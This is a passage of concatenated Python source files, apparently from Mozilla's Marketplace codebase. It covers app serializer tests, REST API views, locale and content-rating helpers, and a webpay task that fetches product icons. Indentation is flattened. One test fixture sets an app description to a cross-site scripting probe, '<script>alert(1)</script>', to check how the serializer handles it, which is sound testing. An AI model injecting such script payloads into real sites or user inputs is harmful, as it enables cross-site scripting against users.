[json.dumps({'body': u'CLASSIND',
'slug': u'0',
'description': u'General Audiences',
'name': u'0+',
'body_slug': u'classind'})])
eq_(rating, {})
def test_no_release_notes(self):
res = self.serialize(self.app)
eq_(res['release_notes'], None)
self.app.current_version.delete()
self.app.update_version()
eq_(self.app.current_version, None)
res = self.serialize(self.app)
eq_(res['release_notes'], None)
def test_release_notes(self):
version = self.app.current_version
version.releasenotes = u'These are nötes.'
version.save()
res = self.serialize(self.app)
eq_(res['release_notes'], {u'en-US': unicode(version.releasenotes)})
self.request = RequestFactory().get('/?lang=whatever')
res = self.serialize(self.app)
eq_(res['release_notes'], unicode(version.releasenotes))
def test_upsell(self):
self.request.REGION = mkt.regions.US
upsell = amo.tests.app_factory()
self.make_premium(upsell)
self.app._upsell_from.create(premium=upsell)
res = self.serialize(self.app)
eq_(res['upsell']['id'], upsell.id)
eq_(res['upsell']['app_slug'], upsell.app_slug)
eq_(res['upsell']['name'], upsell.name)
eq_(res['upsell']['icon_url'], upsell.get_icon_url(128))
self.assertApiUrlEqual(res['upsell']['resource_uri'],
'/apps/app/%s/' % upsell.id)
def test_upsell_not_public(self):
self.request.REGION = mkt.regions.US
upsell = amo.tests.app_factory(disabled_by_user=True)
self.make_premium(upsell)
self.app._upsell_from.create(premium=upsell)
res = self.serialize(self.app)
eq_(res['upsell'], False)
def test_upsell_excluded_from_region(self):
self.request.REGION = mkt.regions.US
upsell = amo.tests.app_factory()
self.make_premium(upsell)
self.app._upsell_from.create(premium=upsell)
upsell.addonexcludedregion.create(region=mkt.regions.US.id)
res = self.serialize(self.app)
eq_(res['upsell'], False)
def test_upsell_region_without_payments(self):
upsell = amo.tests.app_factory()
self.make_premium(upsell)
self.app._upsell_from.create(premium=upsell)
region_id = list(upsell.get_excluded_region_ids())[0]
self.request.REGION = mkt.regions.REGIONS_CHOICES_ID[region_id][1]
res = self.serialize(self.app)
eq_(res['upsell'], False)
class TestAppSerializerPrices(amo.tests.TestCase):
fixtures = fixture('user_2519')
def setUp(self):
self.app = amo.tests.app_factory(premium_type=amo.ADDON_PREMIUM)
self.profile = UserProfile.objects.get(pk=2519)
self.create_flag('override-app-purchase', everyone=True)
self.request = RequestFactory().get('/')
def serialize(self, app, profile=None, region=None, request=None):
if request is None:
request = self.request
request.amo_user = self.profile
request.REGION = region
a = AppSerializer(instance=app, context={'request': request})
return a.data
def test_some_price(self):
self.make_premium(self.app, price='0.99')
res = self.serialize(self.app, region=regions.US)
eq_(res['price'], Decimal('0.99'))
eq_(res['price_locale'], '$0.99')
eq_(res['payment_required'], True)
def test_no_charge(self):
self.make_premium(self.app, price='0.00')
res = self.serialize(self.app, region=regions.US)
eq_(res['price'], Decimal('0.00'))
eq_(res['price_locale'], '$0.00')
eq_(res['payment_required'], False)
def test_wrong_region(self):
self.make_premium(self.app, price='0.99')
res = self.serialize(self.app, region=regions.PL)
eq_(res['price'], None)
eq_(res['price_locale'], None)
eq_(res['payment_required'], True)
def test_with_locale(self):
premium = self.make_premium(self.app, price='0.99')
PriceCurrency.objects.create(region=regions.PL.id, currency='PLN',
price='5.01', tier=premium.price,
provider=1)
with self.activate(locale='fr'):
res = self.serialize(self.app, region=regions.PL)
eq_(res['price'], Decimal('5.01'))
eq_(res['price_locale'], u'5,01\xa0PLN')
def test_missing_price(self):
premium = self.make_premium(self.app, price='0.99')
premium.price = None
premium.save()
res = self.serialize(self.app)
eq_(res['price'], None)
eq_(res['price_locale'], None)
def test_cannot_purchase(self):
self.make_premium(self.app, price='0.99')
res = self.serialize(self.app, region=regions.UK)
eq_(res['price'], None)
eq_(res['price_locale'], None)
eq_(res['payment_required'], True)
def test_can_purchase(self):
self.make_premium(self.app, price='0.99')
res = self.serialize(self.app, region=regions.UK)
eq_(res['price'], None)
eq_(res['price_locale'], None)
eq_(res['payment_required'], True)
@mock.patch('versions.models.Version.is_privileged', False)
class TestESAppToDict(amo.tests.ESTestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
self.create_switch('iarc')
self.profile = UserProfile.objects.get(pk=2519)
self.request = RequestFactory().get('/')
self.request.REGION = mkt.regions.US
self.request.amo_user = self.profile
self.app = Webapp.objects.get(pk=337141)
self.version = self.app.current_version
self.category = Category.objects.create(name='cattest', slug='testcat',
type=amo.ADDON_WEBAPP)
AddonCategory.objects.create(addon=self.app, category=self.category)
self.preview = Preview.objects.create(filetype='image/png',
addon=self.app, position=0)
self.app.description = {
'en-US': u'XSS attempt <script>alert(1)</script>',
'fr': u'Déscriptîon in frènch'
}
self.app.save()
self.refresh('webapp')
def get_obj(self):
return S(WebappIndexer).filter(id=self.app.pk).execute().objects[0]
def serialize(self):
serializer = ESAppSerializer(instance=self.get_obj(),
context={'request': self.request})
return serializer.data
def test_basic(self):
res = self.serialize()
expected = {
'absolute_url': 'http://testserver/app/something-something/',
'app_type': 'hosted',
'author': 'Mozilla Tester',
'banner_regions': [],
'categories': [self.category.slug],
'created': self.app.created,
'current_version': '1.0',
'default_locale': u'en-US',
'description': {
'en-US': u'XSS attempt <script>alert(1)</script>',
'fr': u'Déscriptîon in frènch'
},
'device_types': [],
'homepage': None,
'icons': dict((size, self.app.get_icon_url(size))
for size in (16, 48, 64, 128)),
'id': 337141,
'is_offline': False,
'is_packaged': False,
'manifest_url': 'http://micropipes.com/temp/steamcube.webapp',
'name': {u'en-US': u'Something Something Steamcube!',
u'es': u'Algo Algo Steamcube!'},
'payment_required': False,
'premium_type': 'free',
'previews': [{'thumbnail_url': self.preview.thumbnail_url,
'image_url': self.preview.image_url}],
'privacy_policy': reverse('app-privacy-policy-detail',
kwargs={'pk': self.app.id}),
'public_stats': False,
'ratings': {
'average': 0.0,
'count': 0,
},
'reviewed': self.version.reviewed,
'slug': 'something-something',
'status': 4,
'support_email': None,
'support_url': None,
'supported_locales': [u'en-US', u'es', u'pt-BR'],
'upsell': False,
# 'version's handled below to support API URL assertions.
'weekly_downloads': None,
}
if self.request.amo_user:
expected['user'] = {
'developed': False,
'installed': False,
'purchased': False,
}
ok_('1.0' in res['versions'])
self.assertApiUrlEqual(res['versions']['1.0'],
'/apps/versions/1268829/')
for k, v in expected.items():
eq_(res[k], v,
u'Expected value "%s" for field "%s", got "%s"' %
(v, k, res[k]))
def test_regions(self):
res = self.serialize()
self.assertSetEqual([region['slug'] for region in res['regions']],
[region.slug for region in self.app.get_regions()])
def test_basic_no_queries(self):
# If we don't pass a UserProfile, a free app shouldn't have to make any
# db queries at all.
self.request.amo_user = None
with self.assertNumQueries(0):
self.test_basic()
def test_basic_with_lang(self):
# Check that when ?lang is passed, we get the right language and we get
# empty strings instead of None if the strings don't exist.
self.request = RequestFactory().get('/?lang=es')
self.request.REGION = mkt.regions.US
res = self.serialize()
expected = {
'id': 337141,
'description': u'XSS attempt <script>alert(1)</script>',
'homepage': None,
'name': u'Algo Algo Steamcube!',
'support_email': None,
'support_url': None,
}
for k, v in expected.items():
eq_(res[k], v,
u'Expected value "%s" for field "%s", got "%s"' %
(v, k, res[k]))
def test_content_ratings(self):
self.app.set_content_ratings({
ratingsbodies.CLASSIND: ratingsbodies.CLASSIND_18,
ratingsbodies.GENERIC: ratingsbodies.GENERIC_18,
})
self.app.set_descriptors(['has_generic_violence', 'has_generic_scary',
'has_classind_shocking'])
self.app.set_interactives(['has_digital_purchases', 'has_shares_info'])
self.app.save()
self.refresh('webapp')
self.request.REGION = mkt.regions.ME
res = self.serialize()
eq_(res['content_ratings']['body'], 'generic')
eq_(res['content_ratings']['rating'], '18')
self.assertSetEqual(
res['content_ratings']['descriptors'],
['violence', 'scary'])
self.assertSetEqual(
res['content_ratings']['interactives'],
['digital-purchases', 'shares-info'])
self.request.REGION = mkt.regions.BR
res = self.serialize()
eq_(res['content_ratings']['body'], 'classind')
eq_(res['content_ratings']['rating'], '18')
self.assertSetEqual(
res['content_ratings']['descriptors'],
['shocking'])
def test_show_downloads_count(self):
"""Show weekly_downloads in results if app stats are public."""
self.app.update(public_stats=True)
self.refresh('webapp')
res = self.serialize()
eq_(res['weekly_downloads'], 9999)
def test_devices(self):
AddonDeviceType.objects.create(addon=self.app,
device_type=amo.DEVICE_GAIA.id)
self.app.save()
self.refresh('webapp')
res = self.serialize()
eq_(res['device_types'], ['firefoxos'])
def test_user(self):
self.app.addonuser_set.create(user=self.profile)
self.profile.installed_set.create(addon=self.app)
self.app.addonpurchase_set.create(user=self.profile)
self.app.save()
self.refresh('webapp')
res = self.serialize()
eq_(res['user'],
{'developed': True, 'installed': True, 'purchased': True})
def test_user_not_mine(self):
self.app.addonuser_set.create(user_id=31337)
Installed.objects.create(addon=self.app, user_id=31337)
self.app.addonpurchase_set.create(user_id=31337)
self.app.save()
self.refresh('webapp')
res = self.serialize()
eq_(res['user'],
{'developed': False, 'installed': False, 'purchased': False})
def test_no_price(self):
res = self.serialize()
eq_(res['price'], None)
eq_(res['price_locale'], None)
def test_has_price(self):
self.make_premium(self.app)
self.app.save()
self.refresh('webapp')
res = self.serialize()
eq_(res['price'], Decimal('1.00'))
eq_(res['price_locale'], '$1.00')
eq_(res['payment_required'], True)
def test_not_paid(self):
self.make_premium(self.app)
PriceCurrency.objects.update(paid=False)
self.app.save()
self.refresh('webapp')
res = self.serialize()
eq_(res['price'], None)
eq_(res['price_locale'], None)
def test_no_currency(self):
self.make_premium(self.app)
PriceCurrency.objects.all().delete()
self.app.save()
self.refresh('webapp')
res = self.serialize()
eq_(res['price'], None)
eq_(res['price_locale'], None)
def test_no_payment_account(self):
eq_(self.serialize()['payment_account'], None)
def test_payment_account(self):
self.make_premium(self.app)
seller = SolitudeSeller.objects.create(
resource_uri='/path/to/sel', uuid='seller-id', user=self.profile)
account = PaymentAccount.objects.create(
user=self.profile, uri='asdf', name='test', inactive=False,
solitude_seller=seller, account_id=123)
AddonPaymentAccount.objects.create(
addon=self.app, account_uri='foo', payment_account=account,
product_uri='bpruri')
self.app.save()
self.refresh('webapp')
eq_(self.serialize()['payment_account'],
reverse('payment-account-detail', kwargs={'pk': account.pk}))
def test_release_notes(self):
res = self.serialize()
eq_(res['release_notes'], None)
version = self.app.current_version
version.releasenotes = u'These are nötes.'
version.save()
self.app.save()
self.refresh('webapp')
res = self.serialize()
eq_(res['release_notes'], {u'en-US': unicode(version.releasenotes)})
self.request = RequestFactory().get('/?lang=whatever')
self.request.REGION = mkt.regions.US
res = self.serialize()
eq_(res['release_notes'], unicode(version.releasenotes))
def test_upsell(self):
upsell = amo.tests.app_factory()
self.make_premium(upsell)
self.app._upsell_from.create(premium=upsell)
self.refresh('webapp')
res = self.serialize()
eq_(res['upsell']['id'], upsell.id)
eq_(res['upsell']['app_slug'], upsell.app_slug)
eq_(res['upsell']['name'], upsell.name)
eq_(res['upsell']['icon_url'], upsell.get_icon_url(128))
self.assertApiUrlEqual(res['upsell']['resource_uri'],
'/apps/app/%s/' % upsell.id)
def test_upsell_not_public(self):
upsell = amo.tests.app_factory(disabled_by_user=True)
self.make_premium(upsell)
self.app._upsell_from.create(premium=upsell)
self.refresh('webapp')
res = self.serialize()
eq_(res['upsell'], False)
def test_upsell_is_made_public_later(self):
upsell = amo.tests.app_factory(status=amo.STATUS_PENDING)
self.make_premium(upsell)
self.app._upsell_from.create(premium=upsell)
# Don't use .reload() because it doesn't reset cached_property.
upsell = Webapp.objects.get(pk=upsell.pk)
upsell.update(status=amo.STATUS_PUBLIC)
# Note that we shouldn't have to call self.app.save(), because saving
# the upsell should have triggered the reindex of self.app.
self.refresh('webapp')
res = self.serialize()
eq_(res['upsell']['id'], upsell.id)
eq_(res['upsell']['app_slug'], upsell.app_slug)
eq_(res['upsell']['name'], upsell.name)
eq_(res['upsell']['icon_url'], upsell.get_icon_url(128))
self.assertApiUrlEqual(res['upsell']['resource_uri'],
'/apps/app/%s/' % upsell.id)
def test_upsell_excluded_from_region(self):
upsell = amo.tests.app_factory()
upsell.addonexcludedregion.create(region=mkt.regions.US.id)
self.make_premium(upsell)
self.app._upsell_from.create(premium=upsell)
self.refresh('webapp')
res = self.serialize()
eq_(res['upsell'], False)
def test_upsell_region_without_payments(self):
upsell = amo.tests.app_factory()
self.make_premium(upsell)
self.app._upsell_from.create(premium=upsell)
self.refresh('webapp')
region_id = list(upsell.get_excluded_region_ids())[0]
region = mkt.regions.REGIONS_CHOICES_ID[region_id][1]
self.request.REGION = region
res = self.serialize()
eq_(res['upsell'], False)
def test_developer_name_empty(self):
self.app.current_version.update(_developer_name='')
self.app.addonuser_set.update(listed=False)
self.app.save()
self.refresh('webapp')
res = self.serialize()
eq_(res['author'], '')
class TestSupportedLocales(amo.tests.TestCase):
def setUp(self):
self.manifest = {'default_locale': 'en'}
def check(self, expected):
eq_(get_supported_locales(self.manifest), expected)
def test_empty_locale(self):
self.check([])
def test_single_locale(self):
self.manifest.update({'locales': {'es': {'name': 'eso'}}})
self.check(['es'])
def test_multiple_locales(self):
self.manifest.update({'locales': {'es': {'name': 'si'},
'fr': {'name': 'oui'}}})
self.check(['es', 'fr'])
def test_short_locale(self):
self.manifest.update({'locales': {'pt': {'name': 'sim'}}})
self.check(['pt-PT'])
def test_unsupported_locale(self):
self.manifest.update({'locales': {'xx': {'name': 'xx'}}})
self.check([])
########NEW FILE########
__FILENAME__ = test_views
from django.core.urlresolvers import reverse
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo.tests
from constants.payments import PROVIDER_BANGO, PROVIDER_REFERENCE
from mkt.api.tests.test_oauth import BaseOAuth
from mkt.constants import APP_FEATURES
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.webapps.serializers import (AppSerializer, AppFeaturesSerializer,
SimpleAppSerializer)
from users.models import UserProfile
class TestAppFeaturesSerializer(BaseOAuth):
fixtures = fixture('webapp_337141')
def setUp(self):
self.features = Webapp.objects.get(pk=337141).latest_version.features
self.request = RequestFactory().get('/')
def get_native(self, **kwargs):
self.features.update(**kwargs)
return AppFeaturesSerializer().to_native(self.features)
def test_no_features(self):
native = self.get_native()
ok_(not native['required'])
def test_one_feature(self):
native = self.get_native(has_pay=True)
self.assertSetEqual(native['required'], ['pay'])
def test_all_features(self):
data = dict(('has_' + f.lower(), True) for f in APP_FEATURES)
native = self.get_native(**data)
self.assertSetEqual(native['required'],
[f.lower() for f in APP_FEATURES])
class TestSimpleAppSerializer(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.webapp = Webapp.objects.get(pk=337141)
self.request = RequestFactory().get('/')
def app(self):
return AppSerializer(self.webapp,
context={'request': self.request})
def simple_app(self):
return SimpleAppSerializer(self.webapp,
context={'request': self.request})
def add_pay_account(self, provider=PROVIDER_BANGO):
user = UserProfile.objects.create(email='a', username='b')
acct = PaymentAccount.objects.create(
solitude_seller=SolitudeSeller.objects.create(user=user),
provider=provider, user=user)
AddonPaymentAccount.objects.create(addon=self.webapp,
payment_account=acct)
return acct
def test_regions_present(self):
# Regression test for bug 964802.
data = self.simple_app().data
ok_('regions' in data)
eq_(len(data['regions']), len(self.webapp.get_regions()))
def test_no_payment_account_when_not_premium(self):
eq_(self.app().data['payment_account'], None)
def test_no_payment_account(self):
self.make_premium(self.webapp)
eq_(self.app().data['payment_account'], None)
def test_no_bango_account(self):
self.make_premium(self.webapp)
self.add_pay_account(provider=PROVIDER_REFERENCE)
eq_(self.app().data['payment_account'], None)
def test_payment_account(self):
self.make_premium(self.webapp)
acct = self.add_pay_account()
eq_(self.app().data['payment_account'],
reverse('payment-account-detail', args=[acct.pk]))
########NEW FILE########
__FILENAME__ = utils
# -*- coding: utf-8 -*-
from collections import defaultdict
import commonware.log
from amo.utils import find_language
import lib.iarc
import mkt
log = commonware.log.getLogger('z.webapps')
def get_locale_properties(manifest, property, default_locale=None):
locale_dict = {}
for locale in manifest.get('locales', {}):
if property in manifest['locales'][locale]:
locale_dict[locale] = manifest['locales'][locale][property]
# Add in the default locale name.
default = manifest.get('default_locale') or default_locale
root_property = manifest.get(property)
if default and root_property:
locale_dict[default] = root_property
return locale_dict
def get_supported_locales(manifest):
"""
Returns a list of locales found in the "locales" property of the manifest.
This will convert locales found in the SHORTER_LANGUAGES setting to their
full locale. It will also remove locales not found in AMO_LANGUAGES.
Note: The default_locale is not included.
"""
return sorted(filter(None, map(find_language, set(
manifest.get('locales', {}).keys()))))
def dehydrate_content_rating(rating):
"""
{body.id, rating.id} to translated rating.label.
"""
try:
body = mkt.ratingsbodies.dehydrate_ratings_body(
mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])])
except TypeError:
# Legacy ES format (bug 943371).
return {}
rating = mkt.ratingsbodies.dehydrate_rating(
body.ratings[int(rating['rating'])])
return rating.label
def dehydrate_content_ratings(content_ratings):
"""Dehydrate an object of content ratings from rating IDs to dict."""
for body in content_ratings or {}:
# Dehydrate all content ratings.
content_ratings[body] = dehydrate_content_rating(content_ratings[body])
return content_ratings
def dehydrate_descriptors(keys, body=None):
"""
List of keys to lists of descriptor slugs by body.
['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}.
"""
results = defaultdict(list)
for key in keys:
obj = mkt.ratingdescriptors.RATING_DESCS.get(key)
if obj:
# Slugify and remove body prefix.
body, label = key.lower().replace('_', '-').split('-', 1)
results[body].append(label)
return dict(results)
def dehydrate_interactives(keys):
"""
List of keys to list of interactive slugs.
['SOCIAL_NETWORKING', ...] to ['social-networking', ...].
"""
results = []
for key in keys:
obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key)
if obj:
results.append(key.lower().replace('_', '-'))
return results
def iarc_get_app_info(app):
client = lib.iarc.client.get_iarc_client('services')
iarc = app.iarc_info
iarc_id = iarc.submission_id
iarc_code = iarc.security_code
# Generate XML.
xml = lib.iarc.utils.render_xml(
'get_app_info.xml',
{'submission_id': iarc_id, 'security_code': iarc_code})
# Process that shizzle.
resp = client.Get_App_Info(XMLString=xml)
# Handle response.
return lib.iarc.utils.IARC_XML_Parser().parse_string(resp)
########NEW FILE########
__FILENAME__ = views
from django import forms as django_forms
from django.core.urlresolvers import reverse
from django.http import Http404
import commonware
from rest_framework import exceptions, response, serializers, status, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
import amo
from addons.models import AddonUser
from files.models import FileUpload, Platform
from lib.metrics import record_action
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import (AllowAppOwner, AllowReadOnlyIfPublic,
AllowReviewerReadOnly, AnyOf)
from mkt.api.base import CORSMixin, MarketplaceView, SlugOrIdMixin
from mkt.api.exceptions import HttpLegallyUnavailable
from mkt.api.forms import IconJSONForm
from mkt.developers import tasks
from mkt.developers.forms import AppFormMedia, IARCGetAppInfoForm
from mkt.regions import get_region
from mkt.submit.views import PreviewViewSet
from mkt.webapps.serializers import AppSerializer
from mkt.webapps.models import get_excluded_in, Webapp
log = commonware.log.getLogger('z.api')
class AppViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
viewsets.ModelViewSet):
serializer_class = AppSerializer
slug_field = 'app_slug'
cors_allowed_methods = ('get', 'put', 'post', 'delete')
permission_classes = [AnyOf(AllowAppOwner, AllowReviewerReadOnly,
AllowReadOnlyIfPublic)]
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
def get_queryset(self):
return Webapp.objects.all().exclude(
id__in=get_excluded_in(get_region().id))
def get_base_queryset(self):
return Webapp.objects.all()
def get_object(self, queryset=None):
try:
app = super(AppViewSet, self).get_object()
except Http404:
app = super(AppViewSet, self).get_object(self.get_base_queryset())
# Owners and reviewers can see apps regardless of region.
owner_or_reviewer = AnyOf(AllowAppOwner, AllowReviewerReadOnly)
if owner_or_reviewer.has_object_permission(self.request, self,
app):
return app
data = {}
for key in ('name', 'support_email', 'support_url'):
value = getattr(app, key)
data[key] = unicode(value) if value else ''
data['reason'] = 'Not available in your region.'
raise HttpLegallyUnavailable(data)
self.check_object_permissions(self.request, app)
return app
def create(self, request, *args, **kwargs):
uuid = request.DATA.get('upload', '')
if uuid:
is_packaged = True
else:
uuid = request.DATA.get('manifest', '')
is_packaged = False
if not uuid:
raise serializers.ValidationError(
'No upload or manifest specified.')
try:
upload = FileUpload.objects.get(uuid=uuid)
except FileUpload.DoesNotExist:
raise exceptions.ParseError('No upload found.')
if not upload.valid:
raise exceptions.ParseError('Upload not valid.')
if not request.amo_user.read_dev_agreement:
log.info(u'Attempt to use API without dev agreement: %s'
% request.amo_user.pk)
raise exceptions.PermissionDenied('Terms of Service not accepted.')
if not (upload.user and upload.user.pk == request.amo_user.pk):
raise exceptions.PermissionDenied('You do not own that app.')
plats = [Platform.objects.get(id=amo.PLATFORM_ALL.id)]
# Create app, user and fetch the icon.
obj = Webapp.from_upload(upload, plats, is_packaged=is_packaged)
AddonUser(addon=obj, user=request.amo_user).save()
tasks.fetch_icon.delay(obj)
record_action('app-submitted', request, {'app-id': obj.pk})
log.info('App created: %s' % obj.pk)
data = AppSerializer(
context=self.get_serializer_context()).to_native(obj)
return response.Response(
data, status=201,
headers={'Location': reverse('app-detail', kwargs={'pk': obj.pk})})
def update(self, request, *args, **kwargs):
# Fail if the app doesn't exist yet.
self.get_object()
r = super(AppViewSet, self).update(request, *args, **kwargs)
# Be compatible with tastypie responses.
if r.status_code == 200:
r.status_code = 202
return r
def list(self, request, *args, **kwargs):
if not request.amo_user:
log.info('Anonymous listing not allowed')
raise exceptions.PermissionDenied('Anonymous listing not allowed.')
self.object_list = self.filter_queryset(self.get_queryset().filter(
authors=request.amo_user))
page = self.paginate_queryset(self.object_list)
serializer = self.get_pagination_serializer(page)
return response.Response(serializer.data)
def partial_update(self, request, *args, **kwargs):
raise exceptions.MethodNotAllowed('PATCH')
@action()
def content_ratings(self, request, *args, **kwargs):
app = self.get_object()
form = IARCGetAppInfoForm(data=request.DATA, app=app)
if form.is_valid():
try:
form.save(app)
return Response(status=status.HTTP_201_CREATED)
except django_forms.ValidationError:
pass
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
@action(methods=['POST'],
cors_allowed_methods=PreviewViewSet.cors_allowed_methods)
def preview(self, request, *args, **kwargs):
kwargs['app'] = self.get_object()
view = PreviewViewSet.as_view({'post': '_create'})
return view(request, *args, **kwargs)
@action(methods=['PUT'], cors_allowed_methods=['put'])
def icon(self, request, *args, **kwargs):
app = self.get_object()
data_form = IconJSONForm(request.DATA)
if not data_form.is_valid():
return Response(data_form.errors,
status=status.HTTP_400_BAD_REQUEST)
form = AppFormMedia(data_form.cleaned_data, request=request)
if not form.is_valid():
return Response(data_form.errors,
status=status.HTTP_400_BAD_REQUEST)
form.save(app)
return Response(status=status.HTTP_200_OK)
class PrivacyPolicyViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
viewsets.GenericViewSet):
queryset = Webapp.objects.all()
cors_allowed_methods = ('get',)
permission_classes = [AnyOf(AllowAppOwner, AllowReviewerReadOnly,
AllowReadOnlyIfPublic)]
slug_field = 'app_slug'
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
def retrieve(self, request, *args, **kwargs):
app = self.get_object()
return response.Response(
{'privacy_policy': unicode(app.privacy_policy)},
content_type='application/json')
########NEW FILE########
__FILENAME__ = forms
from django import forms
import happyforms
from mkt.api.forms import SluggableModelChoiceField
from mkt.inapp.models import InAppProduct
from mkt.webapps.models import Webapp
class PrepareWebAppForm(happyforms.Form):
app = SluggableModelChoiceField(queryset=Webapp.objects.valid(),
sluggable_to_field_name='app_slug')
class PrepareInAppForm(happyforms.Form):
inapp = forms.ModelChoiceField(queryset=InAppProduct.objects.all())
class FailureForm(happyforms.Form):
url = forms.CharField()
attempts = forms.IntegerField()
########NEW FILE########
__FILENAME__ = models
import os
from django.conf import settings
from django.db import models
from amo.helpers import absolutify
from amo.models import ModelBase
class ProductIcon(ModelBase):
ext_url = models.CharField(max_length=255, db_index=True, unique=True)
# Height/width of square icon as declared in JWT.
ext_size = models.IntegerField(db_index=True)
# Height/width of local icon after cache.
size = models.IntegerField(db_index=True)
# Image format as told by PIL.
format = models.CharField(max_length=4)
def storage_path(self):
return os.path.join(settings.PRODUCT_ICON_PATH, self._base_path())
def url(self):
return absolutify(os.path.join(settings.PRODUCT_ICON_URL,
self._base_path()))
def _base_path(self):
ext = self.format.lower()
if ext == 'jpeg':
# The CDN only whitelists this extension.
ext = 'jpg'
# This creates an intermediate directory to avoid too-many-links
# errors on Linux, etc
return '%s/%s.%s' % (self.pk / 1000, self.pk, ext)
class Meta:
db_table = 'payment_assets'
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from mkt.webpay.models import ProductIcon
class ProductIconSerializer(serializers.ModelSerializer):
url = serializers.SerializerMethodField('get_url')
def get_url(self, obj):
if not obj.pk:
return ''
return obj.url()
class Meta:
model = ProductIcon
exclude = ('format',)
########NEW FILE########
__FILENAME__ = tasks
from datetime import datetime, timedelta
import logging
import os
import tempfile
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.db import transaction
from celeryutils import task
import requests
from amo.utils import ImageCheck, resize_image
from .models import ProductIcon
log = logging.getLogger('z.webpay.tasks')
@task
@transaction.commit_on_success
def fetch_product_icon(url, ext_size, size, read_size=100000, **kw):
"""
Fetch and store a webpay product icon.
Parameters:
**url**
Absolute URL of icon
**ext_size**
The height/width size that the developer claims it to be
**size**
The height/width webpay wants us to resize it to
The icon will be resized if its ext_size is larger than size.
See webpay for details on how this is used for in-app payments.
"""
if ext_size > size:
resize = True
else:
# Do not resize the icon. Adjust size so that it is correct.
resize = False
size = ext_size
try:
cached_im = ProductIcon.objects.get(ext_url=url, ext_size=ext_size)
except ProductIcon.DoesNotExist:
cached_im = None
now = datetime.now()
if cached_im and (cached_im.modified >
now - timedelta(days=settings.PRODUCT_ICON_EXPIRY)):
log.info('Already fetched URL recently: %s' % url)
return
tmp_dest = tempfile.NamedTemporaryFile(delete=False)
try:
res = requests.get(url, timeout=5)
res.raise_for_status()
for chunk in res.iter_content(read_size):
tmp_dest.write(chunk)
except (AttributeError, AssertionError):
raise # Raise test-related exceptions.
except:
tmp_dest.close()
os.unlink(tmp_dest.name)
log.error('fetch_product_icon error with %s' % url, exc_info=True)
return
else:
tmp_dest.close()
try:
valid, img_format = _check_image(tmp_dest.name, url)
if valid:
if resize:
log.info('resizing in-app image for URL %s' % url)
tmp_dest = _resize_image(tmp_dest, size)
# Save the image to the db.
attr = dict(ext_size=ext_size, size=size, ext_url=url,
format=img_format)
if cached_im:
cached_im.update(**attr)
else:
cached_im = ProductIcon.objects.create(**attr)
log.info('saving image from URL %s' % url)
_store_image(tmp_dest, cached_im, read_size)
finally:
os.unlink(tmp_dest.name)
def _check_image(im_path, abs_url):
valid = True
img_format = ''
with open(im_path, 'rb') as fp:
im = ImageCheck(fp)
if not im.is_image():
valid = False
log.error('image at %s is not an image' % abs_url)
if im.is_animated():
valid = False
log.error('image at %s is animated' % abs_url)
if valid:
img_format = im.img.format
return valid, img_format
def _resize_image(old_im, size):
new_dest = tempfile.NamedTemporaryFile()
new_dest.close()
resize_image(old_im.name, new_dest.name, locally=True)
return new_dest
def _store_image(im_src, product_icon, read_size):
with open(im_src.name, 'rb') as src:
with storage.open(product_icon.storage_path(), 'wb') as fp:
while True:
chunk = src.read(read_size)
if not chunk:
break
else:
fp.write(chunk)
########NEW FILE########
__FILENAME__ = test_tasks
from datetime import datetime, timedelta
import os
from django.conf import settings
from django.core.files.storage import default_storage as storage
import fudge
from fudge.inspector import arg
from nose.tools import eq_
from requests.exceptions import RequestException
from amo.tests import TestCase
from mkt.webpay import tasks
from mkt.webpay.models import ProductIcon
class TestFetchProductIcon(TestCase):
def fetch(self, url='http://site/media/my.jpg', ext_size=512, size=64):
tasks.fetch_product_icon(url, ext_size, size)
def open_img(self):
img = open(os.path.join(os.path.dirname(__file__),
'resources', 'product.jpg'), 'rb')
self.addCleanup(img.close)
return img
@fudge.patch('mkt.webpay.tasks.requests')
def test_ignore_error(self, fake_req):
(fake_req.expects('get')
.raises(RequestException('some error')))
self.fetch()
eq_(ProductIcon.objects.count(), 0)
@fudge.patch('mkt.webpay.tasks.requests')
def test_ignore_valid_image(self, fake_req):
url = 'http://site/my.jpg'
ext_size = 512
size = 64
ProductIcon.objects.create(ext_url=url, size=size, ext_size=ext_size)
self.fetch(url, ext_size, size)
@fudge.patch('mkt.webpay.tasks.requests')
def test_refetch_old_image(self, fake_req):
url = 'http://site/media/my.jpg'
ext_size = 512
now = datetime.now()
old = now - timedelta(days=settings.PRODUCT_ICON_EXPIRY + 1)
prod = ProductIcon.objects.create(ext_url=url, size=64,
ext_size=ext_size)
prod.update(modified=old)
(fake_req.expects('get').returns_fake().expects('iter_content')
.returns(self.open_img())
.expects('raise_for_status'))
self.fetch(url, ext_size)
@fudge.patch('mkt.webpay.tasks.requests')
def test_jpg_extension(self, fake_req):
url = 'http://site/media/my.jpg'
(fake_req.expects('get').returns_fake().expects('iter_content')
.returns(self.open_img())
.expects('raise_for_status'))
self.fetch(url)
prod = ProductIcon.objects.get()
for fn in (prod.storage_path, prod.url):
assert fn().endswith('.jpg'), (
'The CDN only whitelists .jpg not .jpeg. Got: %s' % fn())
@fudge.patch('mkt.webpay.tasks.requests')
def test_ignore_non_image(self, fake_req):
im = open(__file__)
(fake_req.expects('get').returns_fake().expects('iter_content')
.returns(im)
.expects('raise_for_status'))
self.fetch()
eq_(ProductIcon.objects.count(), 0)
@fudge.patch('mkt.webpay.tasks.requests')
def test_fetch_ok(self, fake_req):
url = 'http://site/media/my.jpg'
ext_size = 512
size = 64
(fake_req.expects('get')
